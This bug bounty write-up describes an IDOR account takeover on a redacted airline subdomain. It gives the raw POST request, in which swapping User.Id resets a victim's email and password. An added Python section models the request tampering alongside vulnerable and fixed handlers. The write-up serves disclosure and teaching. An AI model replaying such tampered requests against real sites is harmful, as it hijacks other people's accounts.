How I hacked one of the biggest airlines in the world

Sazouki
Jun 18, 2022


Hello Bug Bounty community, this is my first write-up, about a bug that let me take over all accounts at one of the best-known airlines in the world.

Due to the program policy I will not mention the program name, so I will refer to it as redacted.com.

This program has a wide scope, and I found a couple of account takeovers on different subdomains. As always, I start with subdomain enumeration (I suggest using reconftw) and extract the live domains. I found one domain, x.y.redacted.com, where you can sign up but cannot log in until an admin approves your account.

Once you create your account you receive a confirmation email with the link https://x.y.redacted.com/Home/Index?Value=[Token]. Clicking that link confirms your account, but you still cannot log in because the admin approval is missing. With some quick directory fuzzing I found the endpoint https://x.y.redacted.com/Admin/User/Me, which let me bypass the login. gospider also found an interesting endpoint, /Admin/User/activate, but it threw "Invalid Token", so I decided to add the token I had received in the confirmation email: https://x.y.redacted.com/Admin/User/activate?value=[Token]. Surprisingly, I found that I could edit my account details and set a new password. The request was something like this:

POST /Admin/User/Activate HTTP/2
Host: x.y.redacted.com
Cookie: XXXXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 745
Connection: close

User.Id=127874&User.Name=sazouki&User.U_status=NonVerified&User.FirstName=sazouki&User.MiddleName=victim&User.LastName=victim&User.PreferredFirstName=&User.PreferredMiddleName=&User.PreferredLastName=&User.UserProfile.WorkPhone=&User.UserProfile.CellPhone=66666666666&User.NewPassword=XXX&User.ConfirmPassword=XXX&BirthMonth=11&Birth_Date=19&BirthYear=1992&User.Gender=M&User.AllowFullAccessCompanyAdmin=false&User.SecurityQuestionID=6&User.SecurityAnswer=1&User.SecurityQuestionID2=7&User.SecurityAnswer2=1&User.SecurityQuestionID3=8&User.SecurityAnswer3=1&User.GDSSyncType=LegalName&User.UserProfile.ReceiptEmail=sazouki@wearehackerone.com

Notice the User.Id? Change that to the victim's ID and forward the request, and you will end up changing the victim's account email and password.
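The bug described above is a classic IDOR: the activation token proves the requester owns some account, but the row that actually gets updated is chosen by the client-supplied User.Id. The following is an added example, not code from the original post or from the affected site, that models the endpoint in plain Python. It shows a helper that rewrites only User.Id in the captured form body, a vulnerable handler that trusts that field, and a fixed handler that takes the account from the token and rejects a mismatching User.Id. The user table, the victim ID 127875, the token value and the trimmed request body are all constructed for the example.

```python
# Added example (not from the original write-up): model of the
# /Admin/User/Activate IDOR and its fix. All data below is constructed.
from urllib.parse import parse_qs, urlencode

VICTIM_ID = 127875  # constructed: any other valid account id on the site

# activation token -> account it was issued for (the [Token] from the email)
TOKENS = {"tok-attacker": 127874}

# Trimmed copy of the captured POST body from the write-up
CAPTURED_BODY = (
    "User.Id=127874&User.Name=sazouki&User.U_status=NonVerified"
    "&User.NewPassword=XXX&User.ConfirmPassword=XXX"
    "&User.UserProfile.ReceiptEmail=sazouki@wearehackerone.com"
)


def fresh_store():
    """Constructed in-memory user table, returned fresh so runs are independent."""
    return {
        127874: {"name": "sazouki", "status": "NonVerified",
                 "email": "sazouki@wearehackerone.com", "password": "initial"},
        VICTIM_ID: {"name": "victim", "status": "Verified",
                    "email": "victim@example.com", "password": "victim-secret"},
    }


def tamper_user_id(body, new_id):
    """Rewrite only User.Id in an x-www-form-urlencoded body, keeping every other field."""
    params = parse_qs(body, keep_blank_values=True)
    params["User.Id"] = [str(new_id)]
    return urlencode(params, doseq=True)


def _apply(user, params):
    """Write the fields the endpoint lets a caller change."""
    user["email"] = params["User.UserProfile.ReceiptEmail"][0]
    user["password"] = params["User.NewPassword"][0]
    user["status"] = "Verified"


def activate_vulnerable(token, body, users):
    """Model of the affected endpoint: the token gates access, but the row
    to update is picked from the attacker-controlled User.Id field."""
    if token not in TOKENS:
        return 400, "Invalid Token"
    params = parse_qs(body, keep_blank_values=True)
    target = int(params["User.Id"][0])  # trusted straight from the client
    if target not in users:
        return 404, "No such user"
    _apply(users[target], params)
    return 200, "Updated %d" % target


def activate_fixed(token, body, users):
    """Fixed handler: the account comes from the token, never from the body.
    A User.Id that does not match the token's owner is refused outright."""
    owner = TOKENS.get(token)
    if owner is None:
        return 400, "Invalid Token"
    params = parse_qs(body, keep_blank_values=True)
    if params.get("User.Id", [str(owner)])[0] != str(owner):
        return 403, "Forbidden"
    if params["User.NewPassword"][0] != params["User.ConfirmPassword"][0]:
        return 400, "Passwords do not match"
    _apply(users[owner], params)
    return 200, "Updated %d" % owner


def demo():
    """Replay the tampered request against both handlers and report the victim's password."""
    evil_body = tamper_user_id(CAPTURED_BODY, VICTIM_ID)
    users = fresh_store()
    vuln = activate_vulnerable("tok-attacker", evil_body, users)
    pw_after_vuln = users[VICTIM_ID]["password"]
    users = fresh_store()
    fixed = activate_fixed("tok-attacker", evil_body, users)
    pw_after_fixed = users[VICTIM_ID]["password"]
    return vuln, pw_after_vuln, fixed, pw_after_fixed


if __name__ == "__main__":
    print(demo())
```

A real fix would additionally invalidate the token after one use and require the admin-approval state before any profile edit; the example keeps only the ownership check so the contrast with the vulnerable handler stays visible.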

Thanks all.
